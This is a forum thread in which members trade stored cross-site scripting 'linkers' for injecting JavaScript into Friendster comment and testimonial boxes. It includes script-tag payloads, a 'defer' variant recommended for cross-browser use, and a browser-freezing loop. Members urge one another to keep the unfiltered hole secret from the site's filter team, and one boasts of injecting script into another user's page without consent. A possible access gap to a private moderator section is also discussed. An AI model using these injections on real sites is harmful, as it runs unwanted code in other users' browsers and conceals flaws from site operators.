» wew..:D :D
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wew..:D :D
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Re: wew..:D :D
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I only share the css linker that I made here in the first page..
I hope it can help many members here..
But for the JS Linker ( all browser compatible )..I'll never share it to public..
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I didn't use the Linker yet.
Coz all I want is to embed mp3 and youtube in my comments.
[b]@feruzz.[/b] I'll try my best not to share the linker to anyone unknown.
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[quote=TA Juleigtin Siahaan]wew..
I only share the css linker that I made here in the first page..
I hope it can help many members here..
But for the JS Linker ( all browser compatible )..I'll never share it to public..[/quote]
i'v seen your linker.
and also my js codes that you give to my friend
view source, copy, paste on notepad, send it.
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[quote=KhErMiNaToR]i'v seen your linker.
and also my js codes that you give to my friend
view source, copy, paste on notepad, send it.
great [/quote]
Hello lae kher..
how r u??
I never use ur codes..
ur friend begs me to see ur codes..
I think he wants to try me..
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^ he can see my codes, im not use encryption anymore
FERUZZ!!!!! where are you???
i'v found someone inject this on his comment page:
<">and it works w/o using your quick testimonials
i think we cant use this type of injection anymore
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We usually have a joke Lae Kher..
Please smile..
Btw,how r u??
I miss chatting with u in YM..
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pls take note that the cradle linker already has been filtered by Filster..
so please guys do not share to everyone about my method even to your best friend
just let them find the new hole [/quote]
No worries bro. [quote=KhErMiNaToR]^ he can see my codes, im not use encryption anymore
FERUZZ!!!!! where are you???
i'v found someone inject this on his comment page:
<">and it works w/o using your quick testimonials
i think we cant use this type of injection anymore [/quote]
WTF waaa. I though it was already filtered. but then it isn't wakoko.
Nice discovery.
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[quote=Ephemeral]WTF waaa. I though it was already filtered. but then it isn't wakoko.
Nice discovery. [/quote]
LOL you laughing
what if i injecting this?
[quote]for (var i=0;i<100000000000000000;i++) {
on your comments
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[quote=KhErMiNaToR]^ he can see my codes, im not use encryption anymore
FERUZZ!!!!! where are you???
i'v found someone inject this on his comment page:
<script src='URL JS'></script>
and it works w/o using your quick testimonials
i think we cant use this type of injection anymore [/quote]
nice discovery
I'm not to be worried....
what I'm worried is some FT members can access the mod section
I've saw one member in FT Malaysia can access the Backstage (I guess)
he has showed to me the link of this thread
his name is CraZyRowkZ Emo
thats why he know how to inject the script in the comment
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^ actually that "someone" is me
but i erase that already,
coz im affraid someone (i mean another person) doing the same thing
i think if a normal member click this link, he/he can access the backstage.. http://theftalk.com/f34-The-Backstage.html
just wondering
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this is the proof [url]http://theftalk.com/p1143909-Yesterday-15%3A51%3A10.html#p1143909[/url]
I didnt tell him how to inject the script
this is not a joke...
pls take seriously
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im not joking.
i told you maybe if members can click that link or even this topic link, they can access this section or this topic
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ok...back to the topic
I found that the best linker is
[quote]<script src="[b]JS_URL_HERE[/b]" defer="defer"></script>[/quote]
cross browser compatibility
the [b]defer[/b] attributes tells the browser to wait until it has finished loading and building the page before it will execute the code found in [b]somejsfile.js[/b]
but unfortunately defer is supported only in IE right now for the page optimization
just paste them into textarea then click submit button
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I think the best host for the comment idea is to use other host like fileave because. Ripway is kinda filtered in comments.
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i think fs team was concentrate to media box.
they forget there are to many box on their site
and testimonials text area is one of 'em
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how about if some of mod here are spy
about CraZyRowkZ Emo aka elyas
dont worry because he also will keep secret about XSS
[quote=KhErMiNaToR]LOL you laughing
what if i injecting this?
for (var i=0;i<100000000000000000;i++) {
on your comments[/quote]
yes you can...
just insert
<">the <script> hasnt been filtered LOL
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^ i'v try that once
on my test page
but only 3 alert,,
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<">the owner doesnt know
I've already injected to eykalsyamim's page before & he doesnt know anything...
only viewers can see the alert
» wew..:D :D
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